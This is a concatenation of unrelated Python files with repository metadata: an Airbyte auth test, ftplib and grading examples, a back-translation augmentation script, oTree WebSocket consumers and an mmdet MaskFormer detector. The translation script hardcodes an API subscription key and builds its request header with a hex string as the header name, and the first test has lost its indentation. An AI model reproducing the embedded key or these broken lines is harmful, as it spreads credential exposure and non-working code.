# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from airbyte_cdk.sources.streams.http.auth import MultipleTokenAuthenticator
from source_github import SourceGithub
def test_single_token():
authenticator = SourceGithub()._get_authenticator({"access_token": "123"})
assert isinstance(authenticator, MultipleTokenAuthenticator)
assert ["123"] == authenticator._tokens
authenticator = SourceGithub()._get_authenticator({"credentials": {"access_token": "123"}})
assert ["123"] == authenticator._tokens
authenticator = SourceGithub()._get_authenticator({"credentials": {"personal_access_token": "123"}})
assert ["123"] == authenticator._tokens
def test_multiple_tokens():
authenticator = SourceGithub()._get_authenticator({"access_token": "123, 456"})
assert isinstance(authenticator, MultipleTokenAuthenticator)
assert ["123", "456"] == authenticator._tokens
| [
"noreply@github.com"
] | thomas-vl.noreply@github.com |
4e0405087a86e930b76e5c4543867e7bfb2d61ac | e21599d08d2df9dac2dee21643001c0f7c73b24f | /Others/Modules/networking/ftplib/ftplib_1.py | f35db835c9a52e0f8890ef3ecb682380536ab8d7 | [] | no_license | herolibra/PyCodeComplete | c7bf2fb4ce395737f8c67749148de98a36a71035 | 4ef7d2c3aec6d28a53eed0e649cdeb74df3d783b | refs/heads/master | 2022-07-17T05:39:03.554760 | 2020-05-03T07:00:14 | 2020-05-03T07:00:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | # coding=utf-8
import ftplib
ftp = ftplib.FTP("www.python.org")
ftp.login("anonymous", "ftplib-example-1")
print ftp.dir()
ftp.quit()
| [
"ijumper@163.com"
] | ijumper@163.com |
52a3c79244a82acf35e998f0e5141dfb252fbecd | 9c58a1f594e18cee20128f2c8dad8257429b10d1 | /dropship_taw/__init__.py | 19bff6f8b78c84ee375ecd71cae1ee626628df77 | [] | no_license | gastonfeng/Odoo-eBay-Amazon | e8919768b2a1500209f209ee3aecc7f2fb10cda7 | a9c4a8a7548b19027bc0fd904f8ae9249248a293 | refs/heads/master | 2022-04-05T00:23:50.483430 | 2020-02-19T04:58:56 | 2020-02-19T04:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76 | py | # -*- coding: utf-8 -*-
import models
import purchase
import stock_picking
| [
"yjm@mail.ru"
] | yjm@mail.ru |
85ae1095cbcec3fa5bc1d2dbb7910389e4b86fd0 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_6/cshjam001/question4.py | eaf38914b99ae858c1fb572ee3dd0ae6cf19b467 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | marks=input('Enter a space-separated list of marks:\n')
marks_list=marks.split(' ')
marks_list = [int(i) for i in marks_list]
fail=0
third=0
low_second=0
up_second=0
first=0
for i in marks_list:
if i<50:
fail+=1
elif i<60:
third+=1
elif i<70:
low_second+=1
elif i<75:
up_second+=1
elif i>=75:
first+=1
print('1 |','X'*first,sep='')
print('2+|','X'*up_second,sep='')
print('2-|','X'*low_second,sep='')
print('3 |','X'*third,sep='')
print('F |','X'*fail,sep='')
| [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
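The grade-band cascade in `question4.py` above can also be expressed with `bisect`, which maps each mark to its band in one lookup; the function name and label strings here are an illustrative sketch, not the assignment's required output format:

```python
import bisect

def grade_counts(marks):
    # Boundaries mirror the cascade above: <50 F, <60 third, <70 lower
    # second, <75 upper second, >=75 first.
    boundaries = [50, 60, 70, 75]
    labels = ["F", "3", "2-", "2+", "1"]
    counts = [0] * len(labels)
    for m in marks:
        counts[bisect.bisect_right(boundaries, m)] += 1
    return dict(zip(labels, counts))

print(grade_counts([45, 55, 65, 72, 80]))  # each band gets one mark
```

`bisect_right` puts a mark equal to a boundary (e.g. exactly 50) into the higher band, matching the strict `<` comparisons of the original cascade.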
c8087889a488b72efcbfe902393e594a35f0fbde | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/face/force/side/test_government.py | e3bae4e0b77290e42845a540c14f38df61fdd566 | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,376 | py | # -*- coding: utf-8 -*-
import pandas as pd
import http.client, urllib.parse
from googletrans import Translator
# **********************************************
# *** Update or verify the following values. ***
# **********************************************
# Replace the subscriptionKey string value with your valid subscription key.
target_list = [ "bg", "zh-TW", "iw"]
def translate(text, target="zh-TW", mode='google'):
if mode == 'microsoft':
subscriptionKey = 'a5d3d77c3cf5eb42280cd4bca60e55c1'
host = 'api.microsofttranslator.com'
path = '/V2/Http.svc/Translate'
import xml.etree.ElementTree as ET
def get_suggestions (text, target):
params = '?to=' + target + '&text=' + urllib.parse.quote (text)
headers = {'fb54a99315ae023d88c6a52b004c2335': subscriptionKey}
conn = http.client.HTTPSConnection(host)
conn.request ("GET", path + params, None, headers)
response = conn.getresponse ()
ret = response.read ()
ret = ET.fromstring(ret).text
return ret
return get_suggestions((get_suggestions(text, target)), 'en')
else:
translator = Translator()
tmp = translator.translate(text, dest=target).text
return translator.translate(tmp).text
if __name__ == '__main__':
class_names = ["toxic", "severe_toxic", "obscene", "threat", "insult", "identity_hate"]
import pandas as pd
from tqdm import tqdm
train = pd.read_csv('input/train_clean.csv')
ln = len(train)
# while True:
# x = input()
# print(translate(x))
# print(translate(x, mode='microsoft'))
for i in tqdm(range(ln)):
row = train.iloc[i,:]
data = dict(row)
text = data['comment_text']
# assert type(text)==str
# urllib.parse.quote('')
# continue
# try:
data['comment_text'] = translate(text)
train = train.append(data, ignore_index=True)
# except Exception as e:
# print(text)
# print(e)
# try:
# data['comment_text'] = translate(text, mode='microsoft')
# train = train.append(data, ignore_index=True)
# except Exception as e:
# print(text)
# print(e)
print(train.shape)
train.to_csv('train_augmented.csv', index=False)
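The loop above augments the training set by round-trip ("back") translation: each comment is sent to a pivot language and back to English, and the paraphrase is appended as a new row with the original labels. A minimal offline sketch of that data flow, with the network-bound translator replaced by a deterministic stub (`fake_translate` and `augment_rows` are hypothetical helpers, not part of googletrans or the Microsoft API):

```python
# Sketch of the back-translation augmentation loop, with the network
# call replaced by a stub so the data flow can be followed offline.
def fake_translate(text, target="zh-TW"):
    # A real translator would paraphrase the text; here we just tag it
    # so the augmented copy is visible.
    return "%s [via %s]" % (text, target)

def augment_rows(rows, translate=fake_translate):
    """Append one paraphrased copy of every row, keeping its labels."""
    augmented = list(rows)
    for row in rows:
        copy = dict(row)
        copy["comment_text"] = translate(copy["comment_text"])
        augmented.append(copy)
    return augmented

rows = [{"comment_text": "you are nice", "toxic": 0}]
out = augment_rows(rows)
# `out` now holds the original row plus one translated variant.
```

The real script does the same append via `train.append(data, ignore_index=True)`, one row at a time.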
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
e9e43aa177be41984ff8110f21f4c8529b3b158b | 4352e2e26d7d3bc6b56b65bbe7f5d972735ecc1a | /otree/channels/consumers.py | c0c079f02787550dc2a27194295444360d10f6ce | [
"MIT"
] | permissive | bgreiner/otree-core | a429c1727df1db2f88142a36ca1ff2c0fda6938c | cc21335ec16d1a91c2b7940163077c37c659599f | refs/heads/master | 2020-03-30T19:51:59.206973 | 2018-10-24T14:08:00 | 2018-10-24T14:08:00 | 151,562,644 | 0 | 0 | NOASSERTION | 2018-10-04T11:41:47 | 2018-10-04T11:41:47 | null | UTF-8 | Python | false | false | 17,183 | py | import json
import logging
import django.db
import django.utils.timezone
import traceback
import time
from channels import Group
from channels.generic.websockets import JsonWebsocketConsumer
from django.core.signing import Signer, BadSignature
import otree.session
from otree.channels.utils import get_chat_group
from otree.models import Participant, Session
from otree.models_concrete import (
CompletedGroupWaitPage, CompletedSubsessionWaitPage, ChatMessage)
from otree.common_internal import (
get_models_module
)
import otree.channels.utils as channel_utils
from otree.models_concrete import (
FailedSessionCreation, ParticipantRoomVisit,
FAILURE_MESSAGE_MAX_LENGTH, BrowserBotsLauncherSessionCode)
from otree.room import ROOM_DICT
import otree.bots.browser
from otree.export import export_wide, export_app
import io
import base64
import datetime
from django.conf import settings
logger = logging.getLogger(__name__)
class InvalidWebSocketParams(Exception):
'''exception to raise when websocket params are invalid'''
class OTreeJsonWebsocketConsumer(JsonWebsocketConsumer):
'''
THIS IS NOT PUBLIC API.
Third party apps should not subclass this.
Either copy this class into your code,
or subclass directly from JsonWebsocketConsumer,
'''
def raw_connect(self, message, **kwargs):
try:
super().raw_connect(message, **kwargs)
except InvalidWebSocketParams:
logger.warning('Rejected request: {}'.format(self.path))
def clean_kwargs(self, **kwargs):
'''
subclasses should override if the route receives a comma-separated params arg.
otherwise, this just passes the route kwargs as is (usually there is just one).
The output of this method is passed to self.group_name(), self.post_connect,
and self.pre_disconnect, so within each class, all 3 of those methods must
accept the same args (or at least take a **kwargs wildcard, if the args aren't used)
'''
return kwargs
def group_name(self, **kwargs):
raise NotImplementedError()
def connection_groups(self, **kwargs):
kwargs = self.clean_kwargs(**kwargs)
group_name = self.group_name(**kwargs)
return [group_name]
def connect(self, message, **kwargs):
# don't send accept: True until we upgrade to channels 1.0+
# self.message.reply_channel.send({"accept": True})
# only wrap this for connect. it's not as high-priority for
# disconnect or receive.
kwargs = self.clean_kwargs(**kwargs)
self.post_connect(**kwargs)
def post_connect(self, **kwargs):
pass
def disconnect(self, message, **kwargs):
kwargs = self.clean_kwargs(**kwargs)
self.pre_disconnect(**kwargs)
def pre_disconnect(self, **kwargs):
pass
def receive(self, content, **kwargs):
kwargs = self.clean_kwargs(**kwargs)
self.post_receive(content, **kwargs)
def post_receive(self, content, **kwargs):
pass
class GroupByArrivalTime(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
session_pk, page_index, app_name, player_id = params.split(',')
return {
'app_name': app_name,
'session_pk': int(session_pk),
'page_index': int(page_index),
'player_id': int(player_id)
}
def group_name(self, app_name, player_id, page_index, session_pk):
gn = channel_utils.gbat_group_name(
session_pk, page_index)
return gn
def post_connect(self, app_name, player_id, page_index, session_pk):
models_module = get_models_module(app_name)
group_id_in_subsession = models_module.Group.objects.filter(
player__id=player_id).values_list(
'id_in_subsession', flat=True)[0]
ready = CompletedGroupWaitPage.objects.filter(
page_index=page_index,
id_in_subsession=int(group_id_in_subsession),
session_id=session_pk,
).exists()
if ready:
self.send({'status': 'ready'})
class WaitPage(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
session_pk, page_index, group_id_in_subsession = params.split(',')
return {
'session_pk': int(session_pk),
'page_index': int(page_index),
# don't convert group_id_in_subsession to int yet, it might be null
'group_id_in_subsession': group_id_in_subsession,
}
def group_name(self, session_pk, page_index, group_id_in_subsession):
return channel_utils.wait_page_group_name(
session_pk, page_index, group_id_in_subsession)
def post_connect(self, session_pk, page_index, group_id_in_subsession):
# in case message was sent before this web socket connects
if group_id_in_subsession:
ready = CompletedGroupWaitPage.objects.filter(
page_index=page_index,
id_in_subsession=int(group_id_in_subsession),
session_id=session_pk,
).exists()
else: # subsession
ready = CompletedSubsessionWaitPage.objects.filter(
page_index=page_index,
session_id=session_pk,
).exists()
if ready:
self.send({'status': 'ready'})
class AutoAdvance(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
participant_code, page_index = params.split(',')
return {
'participant_code': participant_code,
'page_index': int(page_index),
}
def group_name(self, page_index, participant_code):
return 'auto-advance-{}'.format(participant_code)
def post_connect(self, page_index, participant_code):
# in case message was sent before this web socket connects
result = Participant.objects.filter(
code=participant_code).values_list(
'_index_in_pages', flat=True)
try:
page_should_be_on = result[0]
except IndexError:
# doesn't get shown because not yet localized
self.send({'error': 'Participant not found in database.'})
return
if page_should_be_on > page_index:
self.send({'auto_advanced': True})
def create_session(message):
group = Group(message['channels_group_name'])
kwargs = message['kwargs']
try:
session = otree.session.create_session(**kwargs)
if message['use_browser_bots']:
otree.bots.browser.initialize_session(
session_pk=session.pk,
case_number=None
)
session.ready_for_browser = True
session.save()
except Exception as e:
# full error message is printed to console (though sometimes not?)
error_message = 'Failed to create session: "{}"'.format(e)
traceback_str = traceback.format_exc()
group.send(
{'text': json.dumps(
{
'error': error_message,
'traceback': traceback_str,
})}
)
FailedSessionCreation.objects.create(
pre_create_id=kwargs['pre_create_id'],
message=error_message[:FAILURE_MESSAGE_MAX_LENGTH],
traceback=traceback_str
)
raise
group.send(
{'text': json.dumps(
{'status': 'ready'})}
)
if 'room_name' in kwargs:
Group(channel_utils.room_participants_group_name(kwargs['room_name'])).send(
{'text': json.dumps(
{'status': 'session_ready'})}
)
class WaitForSession(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, **kwargs):
return kwargs
def group_name(self, pre_create_id):
return channel_utils.create_session_group_name(pre_create_id)
def post_connect(self, pre_create_id):
group_name = self.group_name(pre_create_id)
# in case message was sent before this web socket connects
if Session.objects.filter(
_pre_create_id=pre_create_id, ready_for_browser=True).exists():
self.group_send(group_name, {'status': 'ready'})
else:
failure = FailedSessionCreation.objects.filter(
pre_create_id=pre_create_id
).first()
if failure:
self.group_send(group_name,
{'error': failure.message,
'traceback': failure.traceback})
class RoomAdmin(OTreeJsonWebsocketConsumer):
def group_name(self, room):
return 'room-admin-{}'.format(room)
def post_connect(self, room):
room_object = ROOM_DICT[room]
now = time.time()
stale_threshold = now - 15
present_list = ParticipantRoomVisit.objects.filter(
room_name=room_object.name,
last_updated__gte=stale_threshold,
).values_list('participant_label', flat=True)
# make it JSON serializable
present_list = list(present_list)
self.send({
'status': 'load_participant_lists',
'participants_present': present_list,
})
# prune very old visits -- don't want a resource leak
# because sometimes not getting deleted on WebSocket disconnect
very_stale_threshold = now - 10*60
ParticipantRoomVisit.objects.filter(
room_name=room_object.name,
last_updated__lt=very_stale_threshold,
).delete()
class RoomParticipant(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
room_name, participant_label, tab_unique_id = params.split(',')
return {
'room_name': room_name,
'participant_label': participant_label,
'tab_unique_id': tab_unique_id,
}
def group_name(self, room_name, participant_label, tab_unique_id):
return channel_utils.room_participants_group_name(room_name)
def post_connect(self, room_name, participant_label, tab_unique_id):
if room_name in ROOM_DICT:
room = ROOM_DICT[room_name]
else:
# doesn't get shown because not yet localized
self.send({'error': 'Invalid room name "{}".'.format(room_name)})
return
if room.has_session():
self.send({'status': 'session_ready'})
else:
try:
ParticipantRoomVisit.objects.create(
participant_label=participant_label,
room_name=room_name,
tab_unique_id=tab_unique_id,
last_updated=time.time(),
)
except django.db.IntegrityError:
# possible that the tab connected twice
# without disconnecting in between
# because of WebSocket failure
# tab_unique_id is unique=True,
# so this will throw an integrity error.
# 2017-09-17: I saw the integrityerror on macOS.
# previously, we logged this, but i see no need to do that.
pass
self.group_send(
'room-admin-{}'.format(room_name),
{
'status': 'add_participant',
'participant': participant_label
}
)
def pre_disconnect(self, room_name, participant_label, tab_unique_id):
if room_name in ROOM_DICT:
room = ROOM_DICT[room_name]
else:
# doesn't get shown because not yet localized
self.send({'error': 'Invalid room name "{}".'.format(room_name)})
return
# should use filter instead of get,
# because if the DB is recreated,
# the record could already be deleted
ParticipantRoomVisit.objects.filter(
participant_label=participant_label,
room_name=room_name,
tab_unique_id=tab_unique_id).delete()
if room.has_participant_labels():
if not ParticipantRoomVisit.objects.filter(
participant_label=participant_label,
room_name=room_name
).exists():
# it's ok if there is a race condition --
# in JS removing a participant is idempotent
self.group_send(
'room-admin-{}'.format(room_name),
{
'status': 'remove_participant',
'participant': participant_label
}
)
else:
self.group_send(
'room-admin-{}'.format(room_name),
{
'status': 'remove_participant',
}
)
class BrowserBotsLauncher(OTreeJsonWebsocketConsumer):
def group_name(self, session_code):
return channel_utils.browser_bots_launcher_group(session_code)
class BrowserBot(OTreeJsonWebsocketConsumer):
def group_name(self):
return 'browser_bot_wait'
def post_connect(self):
launcher_session_info = BrowserBotsLauncherSessionCode.objects.first()
if launcher_session_info:
self.send({'status': 'session_ready'})
class ChatConsumer(OTreeJsonWebsocketConsumer):
# Set to True if you want it, else leave it out
strict_ordering = False
def clean_kwargs(self, params):
signer = Signer(sep='/')
try:
original_params = signer.unsign(params)
except BadSignature:
raise InvalidWebSocketParams
channel, participant_id = original_params.split('/')
return {
'channel': channel,
'participant_id': int(participant_id),
}
def group_name(self, channel, participant_id):
return get_chat_group(channel)
def post_connect(self, **kwargs):
history = ChatMessage.objects.filter(
channel=kwargs['channel']).order_by('timestamp').values(
'nickname', 'body', 'participant_id'
)
# Convert ValuesQuerySet to list
self.send(list(history))
def post_receive(self, content, channel, participant_id):
content['channel'] = channel
content['participant_id'] = participant_id
# in the Channels docs, the example has a separate msg_consumer
# channel, so this can be done asynchronously.
# but i think the perf is probably good enough.
# moving into here for simplicity, especially for testing.
nickname_signed = content['nickname_signed']
nickname = Signer().unsign(nickname_signed)
channel = content['channel']
channels_group = get_chat_group(channel)
body = content['body']
participant_id = content['participant_id']
chat_message = {
'nickname': nickname,
'body': body,
'participant_id': participant_id
}
Group(channels_group).send({'text': json.dumps([chat_message])})
ChatMessage.objects.create(
participant_id=participant_id,
channel=channel,
body=body,
nickname=nickname
)
class ExportData(OTreeJsonWebsocketConsumer):
# access to self.message.user for auth
http_user = True
def post_receive(self, content: dict):
'''
if an app name is given, export the app.
otherwise, export all the data (wide).
don't need time_spent or chat yet, they are quick enough
'''
# authenticate
# maybe it should be is_superuser or something else more specific
# but this is to be consistent with the rest of Django's login
if settings.AUTH_LEVEL and not self.message.user.is_authenticated:
logger.warning(
'rejected access to data export through non-authenticated '
'websocket'
)
return
file_extension = content['file_extension']
app_name = content.get('app_name')
if file_extension == 'xlsx':
mime_type = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
IOClass = io.BytesIO
else:
mime_type = 'text/csv'
IOClass = io.StringIO
iso_date = datetime.date.today().isoformat()
with IOClass() as fp:
if app_name:
export_app(app_name, fp, file_extension=file_extension)
file_name_prefix = app_name
else:
export_wide(fp, file_extension=file_extension)
file_name_prefix = 'all_apps_wide'
data = fp.getvalue()
file_name = '{}_{}.{}'.format(
file_name_prefix, iso_date, file_extension)
if file_extension == 'xlsx':
data = base64.b64encode(data).decode('utf-8')
content.update({
'file_name': file_name,
'data': data,
'mime_type': mime_type,
})
self.send(content)
def connection_groups(self, **kwargs):
return []
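`ChatConsumer.clean_kwargs` above rejects any WebSocket whose params do not carry a valid signature from `django.core.signing.Signer(sep='/')`. A standard-library sketch of that sign/unsign pattern — it mimics the shape (value + separator + HMAC signature), not Django's exact wire format, and the secret below is a made-up placeholder:

```python
# Minimal sign/unsign sketch mirroring how ChatConsumer validates its
# "channel/participant_id" params. Not Django's actual implementation.
import hmac
import hashlib

SECRET = b"not-a-real-secret-key"  # placeholder, not a real key

def sign(value, sep="/"):
    sig = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value + sep + sig

def unsign(signed, sep="/"):
    value, _, sig = signed.rpartition(sep)
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        # Django raises BadSignature; clean_kwargs turns that into
        # InvalidWebSocketParams and the connection is rejected.
        raise ValueError("bad signature")
    return value

params = sign("chat-channel-1/42")            # what the page embeds
channel, participant_id = unsign(params).split("/")
```

A tampered string fails verification, which is exactly what lets the consumer trust the channel and participant id it parses out.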
| [
"chris@otree.org"
] | chris@otree.org |
dfeb1a9ad400d0e5dbfd8aca2f98ca7ed2ab8cf7 | 98cd5ddf45a73aea64bbfac0c0104829d7231b81 | /T - Image + Square/info.py | 28870e30ab938ba5ac04edf47271a06dfd397f12 | [] | no_license | atheis4/ETC_Modes_Extra | 42508d523cfe632a3335e29f6e1e40af91df231b | d0ce221562105382a7a73cc6d280f4ad0eabf6f3 | refs/heads/master | 2022-04-04T11:15:07.335910 | 2020-01-03T20:27:32 | 2020-01-03T20:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | name = "T - Image + Square"
description = "Random Image Placement with Square Border"
knob1 = "Image Size"
knob2 = "Square Size"
knob3 = "Image Opacity"
knob4 = "Square Color"
released = "July 28 2017" | [
"media@critterandguitari.com"
] | media@critterandguitari.com |
80af8a1357d45d62529731511322ff710ddf8c1c | 4d675034878c4b6510e1b45b856cc0a71af7f886 | /mmdet/models/detectors/maskformer.py | df8b5c293c483c5b8791cd24d9e36f564bbe57f9 | [
"Apache-2.0",
"BSD-2-Clause-Views",
"MIT",
"BSD-2-Clause"
] | permissive | shinya7y/UniverseNet | 101ebc2ad8f15482ee45ea8d6561aa338a0fa49e | 3652b18c7ce68122dae7a32670624727d50e0914 | refs/heads/master | 2023-07-22T08:25:42.646911 | 2023-07-08T18:09:34 | 2023-07-08T18:09:34 | 263,555,721 | 407 | 58 | Apache-2.0 | 2023-01-27T01:13:31 | 2020-05-13T07:23:43 | Python | UTF-8 | Python | false | false | 10,396 | py | # Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import numpy as np
from mmdet.core import INSTANCE_OFFSET, bbox2result
from mmdet.core.visualization import imshow_det_bboxes
from ..builder import DETECTORS, build_backbone, build_head, build_neck
from .single_stage import SingleStageDetector
@DETECTORS.register_module()
class MaskFormer(SingleStageDetector):
r"""Implementation of `Per-Pixel Classification is
NOT All You Need for Semantic Segmentation
<https://arxiv.org/pdf/2107.06278>`_."""
def __init__(self,
backbone,
neck=None,
panoptic_head=None,
panoptic_fusion_head=None,
train_cfg=None,
test_cfg=None,
init_cfg=None):
super(SingleStageDetector, self).__init__(init_cfg=init_cfg)
self.backbone = build_backbone(backbone)
if neck is not None:
self.neck = build_neck(neck)
panoptic_head_ = panoptic_head.deepcopy()
panoptic_head_.update(train_cfg=train_cfg)
panoptic_head_.update(test_cfg=test_cfg)
self.panoptic_head = build_head(panoptic_head_)
panoptic_fusion_head_ = panoptic_fusion_head.deepcopy()
panoptic_fusion_head_.update(test_cfg=test_cfg)
self.panoptic_fusion_head = build_head(panoptic_fusion_head_)
self.num_things_classes = self.panoptic_head.num_things_classes
self.num_stuff_classes = self.panoptic_head.num_stuff_classes
self.num_classes = self.panoptic_head.num_classes
self.train_cfg = train_cfg
self.test_cfg = test_cfg
# BaseDetector.show_result default for instance segmentation
if self.num_stuff_classes > 0:
self.show_result = self._show_pan_result
def forward_dummy(self, img, img_metas):
"""Used for computing network flops. See
`mmdetection/tools/analysis_tools/get_flops.py`
Args:
img (Tensor): of shape (N, C, H, W) encoding input images.
Typically these should be mean centered and std scaled.
img_metas (list[Dict]): list of image info dict where each dict
has: 'img_shape', 'scale_factor', 'flip', and may also contain
'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'.
For details on the values of these keys see
`mmdet/datasets/pipelines/formatting.py:Collect`.
"""
super(SingleStageDetector, self).forward_train(img, img_metas)
x = self.extract_feat(img)
outs = self.panoptic_head(x, img_metas)
return outs
def forward_train(self,
img,
img_metas,
gt_bboxes,
gt_labels,
gt_masks,
gt_semantic_seg=None,
gt_bboxes_ignore=None,
**kargs):
"""
Args:
img (Tensor): of shape (N, C, H, W) encoding input images.
Typically these should be mean centered and std scaled.
img_metas (list[Dict]): list of image info dict where each dict
has: 'img_shape', 'scale_factor', 'flip', and may also contain
'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'.
For details on the values of these keys see
`mmdet/datasets/pipelines/formatting.py:Collect`.
gt_bboxes (list[Tensor]): Ground truth bboxes for each image with
shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format.
gt_labels (list[Tensor]): class indices corresponding to each box.
gt_masks (list[BitmapMasks]): true segmentation masks for each box
used if the architecture supports a segmentation task.
gt_semantic_seg (list[tensor]): semantic segmentation mask for
images for panoptic segmentation.
Defaults to None for instance segmentation.
gt_bboxes_ignore (list[Tensor]): specify which bounding
boxes can be ignored when computing the loss.
Defaults to None.
Returns:
dict[str, Tensor]: a dictionary of loss components
"""
# add batch_input_shape in img_metas
super(SingleStageDetector, self).forward_train(img, img_metas)
x = self.extract_feat(img)
losses = self.panoptic_head.forward_train(x, img_metas, gt_bboxes,
gt_labels, gt_masks,
gt_semantic_seg,
gt_bboxes_ignore)
return losses
def simple_test(self, imgs, img_metas, **kwargs):
"""Test without augmentation.
Args:
imgs (Tensor): A batch of images.
img_metas (list[dict]): List of image information.
Returns:
list[dict[str, np.array | tuple[list]] | tuple[list]]:
Semantic segmentation results and panoptic segmentation \
results of each image for panoptic segmentation, or formatted \
bbox and mask results of each image for instance segmentation.
.. code-block:: none
[
# panoptic segmentation
{
'pan_results': np.array, # shape = [h, w]
'ins_results': tuple[list],
# semantic segmentation results are not supported yet
'sem_results': np.array
},
...
]
or
.. code-block:: none
[
# instance segmentation
(
bboxes, # list[np.array]
masks # list[list[np.array]]
),
...
]
"""
feats = self.extract_feat(imgs)
mask_cls_results, mask_pred_results = self.panoptic_head.simple_test(
feats, img_metas, **kwargs)
results = self.panoptic_fusion_head.simple_test(
mask_cls_results, mask_pred_results, img_metas, **kwargs)
for i in range(len(results)):
if 'pan_results' in results[i]:
results[i]['pan_results'] = results[i]['pan_results'].detach(
).cpu().numpy()
if 'ins_results' in results[i]:
labels_per_image, bboxes, mask_pred_binary = results[i][
'ins_results']
bbox_results = bbox2result(bboxes, labels_per_image,
self.num_things_classes)
mask_results = [[] for _ in range(self.num_things_classes)]
for j, label in enumerate(labels_per_image):
mask = mask_pred_binary[j].detach().cpu().numpy()
mask_results[label].append(mask)
results[i]['ins_results'] = bbox_results, mask_results
assert 'sem_results' not in results[i], 'semantic segmentation '\
'results are not supported yet.'
if self.num_stuff_classes == 0:
results = [res['ins_results'] for res in results]
return results
def aug_test(self, imgs, img_metas, **kwargs):
raise NotImplementedError
def onnx_export(self, img, img_metas):
raise NotImplementedError
def _show_pan_result(self,
img,
result,
score_thr=0.3,
bbox_color=(72, 101, 241),
text_color=(72, 101, 241),
mask_color=None,
thickness=2,
font_size=13,
win_name='',
show=False,
wait_time=0,
out_file=None):
"""Draw `panoptic result` over `img`.
Args:
img (str or Tensor): The image to be displayed.
result (dict): The results.
score_thr (float, optional): Minimum score of bboxes to be shown.
Default: 0.3.
bbox_color (str or tuple(int) or :obj:`Color`):Color of bbox lines.
The tuple of color should be in BGR order. Default: 'green'.
text_color (str or tuple(int) or :obj:`Color`):Color of texts.
The tuple of color should be in BGR order. Default: 'green'.
mask_color (None or str or tuple(int) or :obj:`Color`):
Color of masks. The tuple of color should be in BGR order.
Default: None.
thickness (int): Thickness of lines. Default: 2.
font_size (int): Font size of texts. Default: 13.
win_name (str): The window name. Default: ''.
wait_time (float): Value of waitKey param.
Default: 0.
show (bool): Whether to show the image.
Default: False.
out_file (str or None): The filename to write the image.
Default: None.
Returns:
img (Tensor): Only if not `show` or `out_file`.
"""
img = mmcv.imread(img)
img = img.copy()
pan_results = result['pan_results']
# keep objects ahead
ids = np.unique(pan_results)[::-1]
legal_indices = ids != self.num_classes # for VOID label
ids = ids[legal_indices]
labels = np.array([id % INSTANCE_OFFSET for id in ids], dtype=np.int64)
segms = (pan_results[None] == ids[:, None, None])
# if out_file specified, do not show image in window
if out_file is not None:
show = False
# draw bounding boxes
img = imshow_det_bboxes(
img,
segms=segms,
labels=labels,
class_names=self.CLASSES,
bbox_color=bbox_color,
text_color=text_color,
mask_color=mask_color,
thickness=thickness,
font_size=font_size,
win_name=win_name,
show=show,
wait_time=wait_time,
out_file=out_file)
if not (show or out_file):
return img
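`_show_pan_result` above recovers category labels from the panoptic map with `id % INSTANCE_OFFSET`: each pixel holds one integer packing a category label and an instance index. A pure-Python sketch of that arithmetic — the offset value follows mmdet's convention, but treat the exact constant as an assumption:

```python
# Sketch of the panoptic-id packing used by _show_pan_result:
#   packed = label + instance_index * INSTANCE_OFFSET
# so `packed % INSTANCE_OFFSET` recovers the label and
# `packed // INSTANCE_OFFSET` the instance index.
INSTANCE_OFFSET = 1000  # mmdet's convention; assumed here

def encode(label, instance_index):
    return label + instance_index * INSTANCE_OFFSET

def decode(packed):
    return packed % INSTANCE_OFFSET, packed // INSTANCE_OFFSET

# Two instances of category 17 and one stuff region of category 5:
pixels = [encode(17, 1), encode(17, 2), encode(5, 0)]
labels = [decode(p)[0] for p in pixels]   # [17, 17, 5]
```

In the method itself the same modulo is applied to the unique ids of the whole map at once via numpy.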
| [
"noreply@github.com"
] | shinya7y.noreply@github.com |
78120becb61c39d95665cd156269b2bb021e6dca | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/580747_Two_quick_functions_object/recipe-580747.py | 537650eed6cc4cbf663fde4bce6deec57d9c17c5 | [
"MIT",
"BSD-2-Clause"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 2,535 | py | def oa(o):
for at in dir(o):
print at,
'''
Sample calls and output for oa() below:
# object attributes of a dict:
oa({})
__class__ __cmp__ __contains__ __delattr__ __delitem__ __doc__ __eq__ __format__
__ge__ __getattribute__ __getitem__ __gt__ __hash__ __init__ __iter__ __le__ __len__
__lt__ __ne__ __new__ __reduce__ __reduce_ex__ __repr__ __setattr__ __setitem__
